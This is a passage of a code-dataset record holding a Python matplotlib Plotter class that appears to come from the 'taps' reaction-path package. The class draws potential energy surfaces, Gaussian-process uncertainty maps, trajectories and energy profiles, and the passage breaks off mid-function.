name='create_post'),\n]","repo_name":"Mutugiii/FYP","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28307288858","text":"import os\nimport pickle\nimport colorsys\nimport matplotlib\nimport numpy as np\nfrom ase.data.colors import jmol_colors\nfrom matplotlib import pyplot as plt\nimport matplotlib.colors as mc\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom taps.utils.shortcut import isStr, isstr, istpl, isBool, isInt, isint\nfrom taps.utils.shortcut import isflt, islst, isTpl, issclr\nfrom taps.utils.shortcut import isarr, asst, dflt\n\n\n# matplotlib.rc('text', usetex=True)\nmatplotlib.rcParams['mathtext.fontset'] = 'stix'\n# matplotlib.rc('font', family='sans-serif')\n\n\ndef setfont(font):\n return r'\\font\\a %s at 14pt\\a ' % font\n\n\ndef lighten_color(color, amount=0.2):\n \"\"\"\n Lightens the given color by multiplying (1-luminosity) by the given\n amount.\n Input can be matplotlib color string, hex string, or RGB tuple.\n\n Examples:\n >> lighten_color('g', 0.3)\n >> lighten_color('#F034A3', 0.6)\n >> lighten_color((.3,.55,.1), 0.5)\n \"\"\"\n try:\n c = mc.cnames.get(color, color)\n except TypeError:\n c = mc.cnames.get(tuple(color), tuple(color))\n c = colorsys.rgb_to_hls(*mc.to_rgb(c))\n return colorsys.hls_to_rgb(c[0], 1 - amount * (1 - c[1]), c[2])\n\n\nclass Plotter:\n plotter_parameters = {\n 'mapfile': {dflt: \"'plotter_map.pkl'\", asst: isStr},\n 'calculate_map': {dflt: \"False\", asst: isBool},\n 'save_format': {dflt: \"'svg'\", asst: isStr},\n 'savefig': {'default': \"False\", 'assert': isBool},\n 'filename': {'default': \"'plotter'\", 'assert': isStr},\n 'translation': {'default': \"0.\", 'assert': 'True'},\n 'conformation': {'default': \"1.\", 'assert': '{name:s} > 0'},\n 'pbc': {'default': \"np.array([True, True, True])\", 'assert': 'True'},\n 'line_color': {'default': \"'r'\", 'assert': isstr},\n 'energy_range': {'default': \"(-100, 100)\", 'assert': isTpl},\n 'energy_digit': {'default': \"-2\", 'assert': isint},\n 'quiver_scale': {'default': \"None\", 'assert': issclr},\n\n 'lgd_ftsz': {'default': \"None\", 'assert': isint},\n 'tick_size': {'default': \"None\", 'assert': isint},\n 'plot_along_distance': {'default': 'True', 'assert': isBool},\n 'prj': {'default': \"None\", 'assert': 'True'},\n\n 'ttl2d': {'default': \"'Potential Energy Surface'\", 'assert': isstr},\n 'fgsz2d': {'default': \"(7.5, 6)\", 'assert': istpl},\n 'xlbl2d': {'default': \"r'$x$'\", 'assert': isstr},\n 'ylbl2d': {'default': \"r'$y$'\", 'assert': isstr},\n 'xlbl2dftsz': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'ylbl2dftsz': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'xlim2d': {'default': \"None\", 'assert': isarr},\n 'ylim2d': {'default': \"None\", 'assert': isarr},\n 'rngX2d': {'default': \"36\", 'assert': isInt},\n 'rngY2d': {'default': \"36\", 'assert': isInt},\n 'alp2d': {'default': \"None\", 'assert': isflt},\n 'cmp2d': {'default': \"None\", 'assert': isstr},\n 'lvls2d': {'default': \"None\", 'assert': islst},\n 'inln2d': {'default': \"True\", 'assert': isBool},\n 'ftsz2d': {'default': \"None\", 'assert': isint},\n 'ftsz2dInfo': {'default': \"None\", 'assert': isint},\n 'fmt2d': {'default': \"'%.2f'\", 'assert': isstr},\n 'pthsClr2d': {'default': \"None\", 'assert': 'True'},\n\n 'ttlGMu': {dflt: \"'Gaussian Potential Energy Surface'\", asst: isstr},\n 'fgszGMu': {'default': \"(7.5, 6)\", 'assert': istpl},\n 'xlblGMu': {'default': \"r'$x$'\", 'assert': isstr},\n 'ylblGMu': {'default': \"r'$y$'\", 'assert': isstr},\n 'ftszGMuXlbl': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'ftszGMuYlbl': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'ftszGMuMx': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'xlimGMu': {'default': \"None\", 'assert': isarr},\n 'ylimGMu': {'default': \"None\", 'assert': isarr},\n 'cmpGMu': {'default': \"None\", 'assert': isstr},\n 'lvlsGMu': {'default': \"None\", 'assert': islst},\n 'inlnGMu': {'default': \"True\", 'assert': isBool},\n 'ftszGMu': {'default': \"None\", 'assert': isint},\n 'fmtGMu': {'default': \"'%.2f'\", 'assert': isstr},\n 'ftszGMuClrbr': {'default': \"None\", 'assert': isflt},\n\n 'ttlGCov': {'default': \"'Uncertainty Map'\", 'assert': isstr},\n 'fgszGCov': {'default': \"(7.5, 6)\", 'assert': istpl},\n 'xlblGCov': {'default': \"r'$x$'\", 'assert': isstr},\n 'ylblGCov': {'default': \"r'$y$'\", 'assert': isstr},\n 'xlimGCov': {'default': \"None\", 'assert': isarr},\n 'ylimGCov': {'default': \"None\", 'assert': isarr},\n 'ftszGCovXlbl': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'ftszGCovYlbl': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'ftszGCovMx': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'cmpGCov': {'default': \"None\", 'assert': isstr},\n 'lvlsGCov': {'default': \"None\", 'assert': islst},\n 'ftszGCovClrbr': {'default': \"None\", 'assert': isflt},\n\n 'ttlE': {'default': \"'Energy'\", 'assert': isstr},\n 'fgszE': {'default': \"(6, 3)\", 'assert': istpl},\n 'ftszE': {'default': \"None\", 'assert': isflt},\n 'xlblE': {'default': \"'Path distance'\", 'assert': isstr},\n 'ylblV': {'default': \"r'Potential Energy'\", 'assert': isstr},\n 'ylblT': {'default': \"r'Kinetic Energy'\", 'assert': isstr},\n 'ftszEXlbl': {'default': \"13\", 'assert': isint},\n 'ftszVYlbl': {'default': \"13\", 'assert': isint},\n 'ftszTYlbl': {'default': \"13\", 'assert': isint},\n 'mrkrV': {'default': \"'-'\", 'assert': isstr},\n 'mrkrH': {'default': \"'--'\", 'assert': isstr},\n 'mrkrT': {'default': \"'r:'\", 'assert': isstr},\n 'ylimHE': {'default': \"None\", 'assert': istpl},\n 'ylimTE': {'default': \"None\", 'assert': istpl},\n 'alpGV': {'default': \"0.2\", 'assert': isflt},\n 'alpGH': {'default': \"0.2\", 'assert': isflt},\n 'fgszLgnd': {'default': \"None\", 'assert': istpl},\n 'ftszLgnd': {'default': \"None\", 'assert': isflt},\n\n 'ttl3d': {'default': \"'Potential Energy Surface'\", 'assert': isstr},\n 'fgsz3d': {'default': \"None\", 'assert': 'True'},\n 'xlbl3d': {'default': \"r'$x$'\", 'assert': isstr},\n 'ylbl3d': {'default': \"r'$y$'\", 'assert': isstr},\n 'zlbl3d': {'default': \"r'$z$'\", 'assert': isstr},\n 'xlbl3dftsz': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'ylbl3dftsz': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'zlbl3dftsz': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n\n 'xlim3d': {'default': \"None\", 'assert': \"True\"},\n 'ylim3d': {'default': \"None\", 'assert': 'True'},\n 'zlim3d': {'default': \"None\", 'assert': 'True'},\n }\n\n def __init__(self, filename=None, prj=None, prjf=None,\n **kwargs):\n self.filename = filename\n self.prj = prj\n self.prjf = prjf\n for key in self.plotter_parameters.keys():\n if key in kwargs:\n setattr(self, key, kwargs[key])\n elif self.__dict__.get(key) is not None:\n continue\n else:\n setattr(self, key, None)\n\n def __setattr__(self, key, value):\n if key == 'prj':\n if value is None:\n def value(x):\n return x\n super().__setattr__(key, value)\n elif key == 'prjf':\n if value is None:\n def value(f, x):\n return f\n super().__setattr__(key, value)\n elif key in self.plotter_parameters:\n default = self.plotter_parameters[key]['default']\n assertion = self.plotter_parameters[key]['assert']\n if value is None:\n value = eval(default.format(name='value'))\n assert eval(assertion.format(name='value')), (key, value)\n super().__setattr__(key, value)\n elif key[0] == '_':\n super().__setattr__(key, value)\n else:\n raise AttributeError('%s not implemented for %s' % (key, value))\n\n def plot(self, paths, savefig=None, filename=None, gaussian=False,\n energy_paths=True):\n if filename is None:\n filename = self.filename\n if savefig is None:\n savefig = self.savefig\n dir = os.path.dirname(filename)\n if dir == '':\n dir = '.'\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n p = self.prj(paths.coords).coords\n\n dim, A = self.get_shape(self.prj(paths.coords))\n if dim == 1:\n raise NotImplementedError('No 1D plot')\n elif dim == 2:\n p0max, p0min = p[0].max(), p[0].min()\n p1max, p1min = p[1].max(), p[1].min()\n p0pad = 0.1 * (p0max - p0min)\n p1pad = 0.1 * (p1max - p1min)\n if self.xlim2d is None:\n self.xlim2d = np.array([p0min - p0pad, p0max + p0pad])\n if self.ylim2d is None:\n self.ylim2d = np.array([p1min - p1pad, p1max + p1pad])\n self.plot_2D(paths, savefig, filename)\n elif dim == 3:\n if self.xlim3d is None:\n self.xlim3d = np.array([p[0].min() - 0.1, p[0].max() + 0.1])\n if self.ylim3d is None:\n self.ylim3d = np.array([p[1].min() - 0.1, p[1].max() + 0.1])\n if self.zlim3d is None:\n self.zlim3d = np.array([p[2].min() - 0.1, p[2].max() + 0.1])\n\n self.plot_3D(paths, savefig, filename)\n else:\n raise NotImplementedError(\"Can't plot \")\n if gaussian and dim == 2:\n self.plot_gaussian(paths, savefig, filename, gaussian)\n if energy_paths:\n self.plot_energy_paths(paths, savefig, filename, gaussian)\n\n def plot_3D(self, paths, savefig, filename):\n Axes3D # silence!\n fig = plt.figure(figsize=self.fgsz3d)\n ax = fig.add_subplot(111, projection='3d')\n self._fig, self._ax = fig, ax\n ax.set_title(self.ttl3d)\n ax.set_xlabel(self.xlbl3d, fontsize=self.xlbl3dftsz)\n ax.set_ylabel(self.ylbl3d, fontsize=self.ylbl3dftsz)\n ax.set_zlabel(self.zlbl3d, fontsize=self.zlbl3dftsz)\n\n ax.set_xlim(self.display_lim(self.xlim3d))\n ax.set_ylim(self.display_lim(self.ylim3d))\n ax.set_zlim(self.display_lim(self.zlim3d))\n\n self.plot_trajectory(paths, plt, ax)\n\n if savefig:\n # plt.tight_layout()\n paths.save(real_model=True, filename=filename)\n coords = paths.coords.coords[:]\n with open(filename + '_3D.npz', 'wb') as fd:\n np.savez(fd, coords=coords)\n with open(filename + '_fig3D.pkl', 'wb') as fd:\n pickle.dump(fig, fd)\n plt.savefig(filename + '_3D.' + self.save_format,\n format=self.save_format)\n\n def plot_2D(self, paths, savefig, filename):\n fig, ax = plt.subplots(figsize=self.fgsz2d)\n ax.tick_params(axis='both', which='major', labelsize=self.tick_size)\n # ax.set_title(self.ttl2d)\n # ax.set_xlabel(self.xlbl2d, fontsize=self.xlbl2dftsz)\n # ax.set_ylabel(self.ylbl2d, fontsize=self.ylbl2dftsz)\n\n plt.xlim(self.display_lim(self.xlim2d))\n plt.ylim(self.display_lim(self.ylim2d))\n\n X, Y = self.get_meshgrid(grid_type='contour')\n\n if self.calculate_map:\n Z = self.calculate_model_map(paths, model_type='real')\n Z.reshape((self.rngX2d, self.rngY2d))\n with open(self.mapfile, 'wb') as f:\n pickle.dump(Z, f)\n elif os.path.exists(self.mapfile):\n with open(self.mapfile, 'rb') as f:\n Z = pickle.load(f)\n if Z.shape != X.shape:\n range_x, range_y = Z.shape\n X, Y = self.get_meshgrid(grid_type='contour',\n range_x=range_x, range_y=range_y)\n else:\n Z = np.zeros((self.rngX2d, self.rngY2d))\n ctrkwargs = {}\n if self.lvls2d is not None:\n ctrkwargs['levels'] = self.lvls2d\n CS = ax.contourf(X, Y, self.display_map(Z, map_type='contour'),\n cmap=self.cmp2d, corner_mask=True,\n **ctrkwargs)\n\n fig.colorbar(CS)\n\n self.plot_trajectory(paths, plt, ax)\n # self.plot_information(paths, plt, ax, information='finder')\n\n if savefig:\n plt.tight_layout()\n np.savez(filename+\"_2Dmap.npz\", X=X, Y=Y, Z=Z,\n coords=paths.coords.coords, epoch=paths.coords.epoch,\n unit=paths.coords.unit,\n coordstype=paths.coords.__class__.__name__)\n # with open(filename + '_fig2D.pkl', 'wb') as f:\n # pickle.dump(fig, f)\n plt.savefig(filename + '_2D.' + self.save_format,\n format=self.save_format)\n\n def plot_gaussian(self, paths, savefig, filename, gaussian):\n if not gaussian:\n return\n fig, ax = plt.subplots(figsize=self.fgszGMu)\n ax.tick_params(axis='both', which='major', labelsize=self.tick_size)\n\n # ax.set_title(self.ttlGMu)\n\n # ax.set_xlabel(self.xlblGMu, fontsize=self.ftszGMuXlbl)\n # ax.set_ylabel(self.ylblGMu, fontsize=self.ftszGMuYlbl)\n\n d_xlim = self.display_lim(self.xlim2d)\n d_ylim = self.display_lim(self.ylim2d)\n ax.set_xlim(d_xlim)\n ax.set_ylim(d_ylim)\n\n ave_map = self.calculate_model_map(paths, model_type='ave_map')\n cov_map = self.calculate_model_map(paths, model_type='cov_map')\n self._ave_map = ave_map\n self._cov_map = cov_map\n\n X, Y = self.get_meshgrid(grid_type='contour')\n # cax = fig.add_axes()\n\n CS = ax.contourf(X, Y, self.display_map(ave_map, map_type='contour'),\n cmap=self.cmpGMu, levels=self.lvlsGMu)\n # ax.clabel(CS, inline=self.inlnGMu, fontsize=self.ftszGMu,\n # fmt=self.fmtGMu)\n # im = ax.pcolormesh(X, Y, self.display_map(ave_map), cmap=self.cma2,\n # vmin=-150, vmax=100)\n # fig.colorbar(im, cax=cax)\n # cbar = fig.colorbar(CS)\n # ticklabs = cbar.ax.get_yticklabels()\n # cbar.ax.set_yticklabels(ticklabs, fontsize=self.ftszGMuClrbr)\n # cbar.ax.tick_params(labelsize=self.ftszGMuClrbr)\n\n # forces = paths.model.get_forces(paths, index=np.s_[:])\n self.plot_trajectory(paths, plt, ax,\n xlim=self.xlimGMu, ylim=self.ylimGMu)\n # self.plot_data(paths, plt, ax)\n # self.plot_information(paths, plt, ax, information='finder')\n # self.plot_info_map(paths, plt, ax, information='maximum_energy')\n\n if savefig:\n # plt.tight_layout()\n # with open(filename + '_figmu.pkl', 'wb') as f:\n # pickle.dump(fig, f)\n with open(filename + '_mu.pkl', 'wb') as f:\n pickle.dump(self.display_map(ave_map, map_type='contour'), f)\n with open(filename + '_coords.pkl', 'wb') as f:\n pickle.dump(paths.coords, f)\n plt.savefig(filename + '_mu.' + self.save_format,\n format=self.save_format)\n\n fig, ax = plt.subplots(figsize=self.fgszGCov)\n ax.tick_params(axis='both', which='major', labelsize=self.tick_size)\n\n # ax.set_title(self.ttlGCov)\n ax.set_xlim(d_xlim)\n ax.set_ylim(d_ylim)\n # ax.set_xlabel(self.xlblGCov, fontsize=self.ftszGCovXlbl)\n # ax.set_ylabel(self.ylblGCov, fontsize=self.ftszGCovYlbl)\n\n im = ax.contourf(X, Y, self.display_map(cov_map, map_type='contour'),\n cmap=self.cmpGCov, levels=self.lvlsGCov)\n # im = ax.pcolormesh(X, Y, self.display_map(cov_map), vmax=2, vmin=0,\n # cmap=self.cma3)\n # fig.colorbar(im, cax=cax)\n cbar2 = fig.colorbar(im)\n ticklabs2 = cbar2.ax.get_yticklabels()\n # cbar2.ax.set_yticklabels(ticklabs2, fontsize=self.ftszGCovClrbr)\n # cbar2.ax.tick_params(labelsize=self.ftszGCovClrbr)\n self.plot_trajectory(paths, plt, ax,\n xlim=self.xlimGCov, ylim=self.ylimGCov)\n self.plot_data(paths, plt, ax, mark_update=True)\n # self.plot_information(paths, plt, ax, information='gaussian')\n # self.plot_info_map(paths, plt, ax, information='maximum_uncertainty')\n if savefig:\n np.savez(filename+\"_GPmap.npz\", X=X, Y=Y, ave=ave_map, cov=cov_map,\n coords=paths.coords.coords, epoch=paths.coords.epoch,\n unit=paths.coords.unit,\n coordstype=paths.coords.__class__.__name__,\n **paths.model.kernel.hyperparameters)\n # plt.tight_layout()\n # with open(filename + '_figcov.pkl', 'wb') as f:\n # pickle.dump(fig, f)\n with open(filename + '_cov.pkl', 'wb') as f:\n pickle.dump(self.display_map(cov_map, map_type='contour'), f)\n plt.savefig(filename + '_cov.' + self.save_format,\n format=self.save_format)\n\n def plot_energy_paths(self, paths, savefig, filename, gaussian):\n # Vunit, Kunit = '', ''\n Vunit = ''\n if paths.model.real_model.unit != 'unitless':\n Vunit = '$(%s)$' % paths.model.unit\n # Kunit = '$(%s)$' % (paths.coords.unit or 'unitless')\n\n fig, ax = plt.subplots(figsize=self.fgszE)\n ax.tick_params(axis='both', which='major', labelsize=self.tick_size)\n if self.ylimHE is not None:\n ax.set_ylim(self.ylimHE)\n # ttlE = ''\n # formatkwargs = {'x': 'dist', 'pf': 'paths.finder'}\n\n ax.set_ylabel('Total & Potential', fontsize=self.ftszVYlbl)\n\n dist = paths.get_distances(index=np.s_[1:-1])\n V = paths.get_potential(index=np.s_[1:-1])\n T = paths.get_kinetic_energies(index=np.s_[1:-1])\n lns = ax.plot(dist, V, self.mrkrV, label='$V$')\n if gaussian:\n cov_coords = paths.get_covariance(index=np.s_[1:-1])\n color = lighten_color(lns[0].get_color())\n ax.fill_between(dist, V + cov_coords, V - cov_coords,\n color=color, label=r'$\\Sigma$')\n cov_max_idx = cov_coords.argmax()\n annot_x = dist[cov_max_idx]\n annot_y = V[cov_max_idx] + cov_coords.max()\n\n H = V + T\n # ax.plot(dist, H, '--')\n ax2 = ax.twinx()\n if self.ylimTE is not None:\n ax2.set_ylim(self.ylimTE)\n ax2.tick_params(axis='both', which='major', labelsize=self.tick_size)\n # ax2.set_ylabel(self.ylblT + Kunit, fontsize=self.ftszTYlbl)\n ax2.set_ylabel(self.ylblT, fontsize=self.ftszTYlbl)\n if self.plot_along_distance:\n lns += ax.plot(dist, H, self.mrkrH, label='$H$')\n lns += ax2.plot(dist, T, self.mrkrT, label='$T$')\n else:\n lns += ax.plot(H, self.mrkrH, label='$H$')\n lns += ax2.plot(T, self.mrkrT, label='$T$')\n\n x0 = dist[V.argmax()]\n y0 = V.min()\n x1 = x0\n y1 = V.max()\n dE = (V.max() - y0)\n dE = r'$%s$' % self.display_float(dE, unit=Vunit)\n if savefig:\n plt.tight_layout()\n if gaussian:\n np.savez(filename + '_Egraph.npz', V=V, H=H, T=T,\n cov=cov_coords)\n with open(filename + '_VHTVarEt.pkl', 'wb') as f:\n pickle.dump(V, f)\n pickle.dump(H, f)\n pickle.dump(T, f)\n pickle.dump(cov_coords, f)\n # pickle.dump(paths.finder.real_finder.Et, f)\n else:\n np.savez(filename + '_Egraph.npz', V=V, H=H, T=T)\n with open(filename + '_figE.pkl', 'wb') as f:\n pickle.dump(fig, f)\n plt.savefig(filename + '_E.' + self.save_format,\n format=self.save_format)\n\n # handles, labels = ax2.get_legend_handles_labels()\n # ax2.get_legend_handles_labels()\n labs = [l.get_label() for l in lns]\n plt.legend(lns, labs, loc='upper left', fontsize=self.ftszLgnd)\n\n if savefig:\n plt.tight_layout()\n with open(filename + '_figLgnd.pkl', 'wb') as f:\n pickle.dump(fig, f)\n plt.savefig(filename + '_Lgnd.' + self.save_format,\n format=self.save_format)\n plt.close('all')\n\n def plot_trajectory(self, paths, plt, ax, xlim=None, ylim=None, zlim=None,\n forces=None):\n plotter_coords = self.prj(paths.coords).coords\n dim, A = self.get_shape(plotter_coords)\n if dim == 2:\n D = dim * A\n coords = plotter_coords.reshape(D, 1, -1)\n line_color = [self.line_color]\n scatter_color = [lighten_color(self.line_color, amount=0.5)]\n # scatter_color = ['orange']\n else:\n coords = plotter_coords\n line_color = jmol_colors[paths.model.real_model.image.symbols.numbers]\n # line_color = jmol_colors[[13]*12 + [79]]\n # line_color = jmol_colors[[13]*12 + [79]]\n scatter_color = [lighten_color(c) for c in line_color]\n for i in range(A):\n coord = coords[..., i, :]\n d_coord = self.display_coord(coord, xlim=xlim, ylim=ylim, zlim=zlim)\n d_traj = self.periodic_masked_array(d_coord, xlim, ylim, zlim)\n # ax.plot(*d_path, color=color[i])\n # ax.scatter(*d_path, color='orange')\n ax.plot(*d_traj, color=line_color[i])\n ax.scatter(*d_coord, color=scatter_color[i], alpha=0.5)\n if forces is not None:\n force = forces[:, i, :]\n # *(forces.reshape(-1, paths.coords.N))\n ax.quiver(*d_coord, *force, color='w')\n\n def plot_data(self, paths, plt, ax, mark_update=False, quiver_scale=None):\n if quiver_scale is None and self.quiver_scale is None:\n quiver_scale = 1 / self.conformation\n elif quiver_scale is None:\n quiver_scale = self.quiver_scale\n\n D, N = paths.coords.shape\n data = paths.get_image_data()\n X_dat = self.display_coord(data['coords'].reshape(D, -1))\n F_dat = -data['gradients'].reshape(D, -1)\n tX, tY = X_dat[0, :], X_dat[1, :]\n ax.scatter(tX, tY, color='black', marker='x', s=paths.coords.N)\n ax.quiver(tX, tY, *F_dat, color='w', angles='xy', scale_units='xy',\n scale=quiver_scale)\n if mark_update:\n ax.scatter(tX[-1], tY[-1], color='red', marker='X',\n s=paths.coords.N)\n\n def plot_information(self, paths, plt, ax, information='finder', xlim=None,\n ylim=None):\n if xlim is None:\n xlim = self.display_lim(self.xlim2d)\n if ylim is None:\n ylim = self.display_lim(self.ylim2d)\n if information == 'finder':\n param = r''\n for key, value in paths.finder.display_map_parameters.items():\n number = eval(value['value'].format(pf='paths.finder'))\n unit = eval(value.get('unit', '\"\"').format(p='paths'))\n if unit == 'unitless' or unit is None:\n unit = ''\n force_LaTex = value.get('force_LaTex', False)\n significant_digit = value.get('significant_digit')\n df_kwargs = {'unit': unit, 'force_latex': force_LaTex,\n 'significant_digit': significant_digit}\n number = self.display_float(number, **df_kwargs)\n param += value['label'] + r'$: {n:s}$'.format(n=number)\n param += '\\n'\n elif information == 'gaussian':\n param = r''\n # display_digit = min(np.log10(np.abs(values)))\n # for key, value in paths.model.hyperparameters.items():\n # if key == 'sigma_f':\n # continue\n # number = self.display_float(value, force_latex=True,\n # significant_digit=2)\n # param += r'$\\{key:s}: {n:s}$'.format(key=key, n=number)\n # param += '\\n'\n if param != r'':\n param = param[:-1]\n\n ec = (0.5, 0.5, 0.5)\n fc = (1., 1., 1.)\n ax2 = plt.text(0.5, 2.1, param, size=self.ftsz2dInfo,\n ha=\"left\", va=\"top\",\n bbox=dict(boxstyle=\"round\", ec=ec, fc=fc, alpha=0.5))\n plt.gcf().canvas.draw()\n box = ax2.get_window_extent().transformed(plt.gca().transData.inverted())\n x1 = xlim[-1] - (xlim[-1] - xlim[0]) / 40\n y0 = ylim[-1] - (ylim[-1] - ylim[0]) / 20\n x0 = x1 - box.width\n ax2.set_position([x0, y0, box.width, box.height])\n\n def plot_info_map(self, paths, plt, ax, information='maximum_energy'):\n if information == 'maximum_energy':\n E = paths.get_potential(index=np.s_[1:-1])\n unit = paths.model.unit\n string = r'$\\mu^{(max)} : %s$' % self.display_float(E.max(),\n unit=unit)\n\n xy = paths.coords.coords[..., 1 + E.argmax()].flatten()\n fontsize = self.ftszGMuMx\n elif information == 'maximum_uncertainty':\n cov = paths.get_covariance()\n # cov[cov < 0] = 0\n string = r'$\\Sigma^{(max)} : %s$' % self.display_float(\n cov.max(), force_latex=True,\n significant_digit=2)\n xy = paths.coords.coords[..., cov.argmax()].flatten()\n fontsize = self.ftszGCovMx\n xy *= self.conformation\n offset = 64\n ec = (0.5, 0.5, 0.5)\n fc = (1., 1., 1.)\n\n ax.annotate(text=string, xy=xy, xytext=(-1.5 * offset, -offset),\n textcoords='offset points', fontsize=fontsize,\n bbox=dict(boxstyle=\"round\", ec=ec, fc=fc, alpha=0.5),\n arrowprops=dict(connectionstyle=\"arc3,rad=.3\",\n arrowstyle='->'))\n\n def plot_legend(self, paths, plt, ax):\n ax3 = plt.subplot(111)\n box = ax.get_position()\n ax3.set_position([box.x0, box.y0, box.width * 0.65, box.height])\n legend_x = 1\n legend_y = 0.5\n plt.legend([self.mrkrV, self.mrkrH, self.mrkrT], loc='center left',\n bbox_to_anchor=(legend_x, legend_y), fontsize=self.lgd_ftsz)\n\n def periodic_masked_array(self, coord, xlim=None, ylim=None, zlim=None):\n \"\"\"\n coord is D x P array\n \"\"\"\n D, P = coord.shape\n conformation = self.conformation\n diff = self.display_size(xlim, ylim, zlim, dimension=D)\n diff *= 0.5 * conformation\n coord_diff = np.diff(coord) # D x P - 1\n mask_coord = np.hstack([np.abs(coord_diff) > diff, np.zeros((D, 1))])\n mask = np.any(mask_coord, axis=0)\n idx = np.argwhere(mask).flatten()\n mask_pad = np.zeros((D, len(idx) * 3), dtype=bool)\n mask_pad[:, 1::3] = True\n periodic_mask = np.insert(np.zeros((D, P), dtype=bool),\n np.repeat(idx + 1, 3), mask_pad, axis=1)\n coord_ = coord[:, idx + 1] # D x P'\n _coord = coord[:, idx] # D x P'\n m_coord = mask_coord[:, idx]\n coord_sign = np.sign(coord_diff[:, idx])\n coord_pad = np.zeros((D, len(idx) * 3))\n\n patch = m_coord * coord_sign * diff * 2 * conformation\n coord_pad[:, ::3] = coord_ - patch\n coord_pad[:, 2::3] = _coord + patch\n periodic_coord = np.insert(coord, np.repeat(idx + 1, 3), coord_pad,\n axis=1)\n return np.ma.MaskedArray(periodic_coord, periodic_mask)\n\n def display_window(self, xlim=None, ylim=None, zlim=None, dimension=3):\n if xlim is None:\n if dimension == 2:\n xlim = self.xlim2d\n elif dimension == 3:\n xlim = self.xlim3d\n if ylim is None:\n if dimension == 2:\n ylim = self.ylim2d\n elif dimension == 3:\n ylim = self.ylim3d\n if dimension == 3 and zlim is None:\n zlim = self.zlim3d\n return {0: xlim, 1: ylim, 2: zlim}\n\n def display_origin(self, xlim=None, ylim=None, zlim=None,\n translation=None, dimension=3):\n if translation is None:\n translation = self.translation\n origin = np.zeros(dimension)\n win = self.display_window(xlim=xlim, ylim=ylim, zlim=zlim,\n dimension=dimension)\n if np.isscalar(translation):\n translation = np.array([translation] * dimension)\n for i in range(dimension):\n origin[i] = win[i][0] + translation[i]\n return origin\n\n def display_size(self, xlim=None, ylim=None, zlim=None, dimension=3):\n win = self.display_window(xlim, ylim, zlim, dimension)\n window_size = np.zeros((dimension, 1))\n for i in range(dimension):\n window_size[i] = (win[i][1] - win[i][0])\n return window_size\n\n def display_map(self, Z, map_type='pcolormesh'):\n \"\"\"\n X : 2 x P\n Y : 2 x P\n Z : 2 x P\n \"\"\"\n if map_type == 'pcolormesh':\n return Z\n elif map_type == 'contour':\n return Z\n # _Z = np.vstack([Z, Z[0]])\n # _Z = np.hstack([_Z, _Z[:, -1, np.newaxis]])\n # return _Z\n else:\n NotImplementedError('only `contour` `pcolormesh` support')\n\n def display_lim(self, lim, translation=None, conformation=None):\n if lim is None:\n return None\n elif type(lim) == list:\n lim = np.array(lim)\n if translation is None:\n translation = self.translation\n if conformation is None:\n conformation = self.conformation\n return conformation * (lim + translation)\n\n def display_coord(self, coord, xlim=None, ylim=None, zlim=None,\n conformation=None, pbc=None):\n \"\"\"\n coord : D x P\n \"\"\"\n if conformation is None:\n conformation = self.conformation\n if pbc is None:\n pbc = self.pbc\n p = np.zeros(coord.shape)\n D = p.shape[0]\n origin = self.display_origin(xlim, ylim, zlim, dimension=D)\n win_size = self.display_size(xlim, ylim, zlim, dimension=D)\n for d in range(D):\n if pbc[d]:\n p[d] = (coord[d] - origin[d]) % (win_size[d]) + origin[d]\n else:\n p[d] = coord[d]\n return conformation * p\n\n def get_shape(self, coords):\n if len(coords.shape) == 2:\n return coords.shape[0], 1\n elif len(coords.shape) == 3:\n return coords.shape[:2]\n else:\n shape = ','.join([str(d) for d in coords.shape])\n raise NotImplementedError('invalid shape (' + shape + ')')\n\n def get_meshgrid(self, grid_type='coords', xlim=None, ylim=None,\n range_x=None, range_y=None):\n if xlim is None:\n xlim = self.xlim2d\n if ylim is None:\n ylim = self.ylim2d\n if range_x is None:\n range_x = self.rngX2d\n if range_y is None:\n range_y = self.rngY2d\n xlim = np.array(xlim) + self.translation\n ylim = np.array(ylim) + self.translation\n if grid_type == 'coords':\n x = np.linspace(*xlim, range_x)\n y = np.linspace(*ylim, range_y)\n X, Y = np.meshgrid(x, y)\n # return np.c_[X.ravel(), Y.ravel()].T[:, np.newaxis, :]\n return np.c_[X.ravel(), Y.ravel()].T\n elif grid_type in ['contour']:\n x = np.linspace(*xlim, range_x)\n y = np.linspace(*ylim, range_y)\n return self.conformation * np.array(np.meshgrid(x, y))\n elif grid_type in ['pcolormesh']:\n x = np.linspace(*xlim, range_x + 1)\n y = np.linspace(*ylim, range_y + 1)\n return self.conformation * np.array(np.meshgrid(x, y))\n else:\n NotImplementedError('Only `contour`, `pcolormesh` supports')\n\n def calculate_model_map(self, paths, model_type='real', xlim=None,\n ylim=None, range_x=None, range_y=None,\n grid_type='coords'):\n if range_x is None:\n range_x = self.rngX2d\n if range_y is None:\n range_y = self.rngY2d\n _coords = self.get_meshgrid(xlim=xlim, ylim=ylim, grid_type=grid_type)\n coords = self.prj(paths.coords(coords=_coords))\n shape = (range_x, range_y)\n if model_type == 'real':\n E = paths.get_potential(coords=coords, real_model=True)\n return E.reshape(shape)\n elif model_type == 'ave_map':\n ave_map = paths.get_potential(coords=coords)\n return ave_map.reshape(shape)\n elif model_type == 'cov_map':\n cov_map = paths.get_covariance(coords=coords)\n return cov_map.reshape(shape)\n\n def display_float(self, f, display_range=None, display_digit=None,\n leading_digit=None, last_digit=None,\n significant_digit=None, unit='', force_latex=False):\n \"\"\"\n get float\n return string\n \"\"\"\n if display_range is None:\n display_range = self.energy_range\n if display_digit is None:\n display_digit = self.energy_digit\n if leading_digit is None:\n leading_digit = int(np.max(np.log10(np.abs(display_range))))\n lower, upper = display_range\n if last_digit is None:\n last_digit = np.min([display_digit, np.log10(upper - lower)])\n last_digit = int(last_digit)\n if significant_digit is None:\n significant_digit = 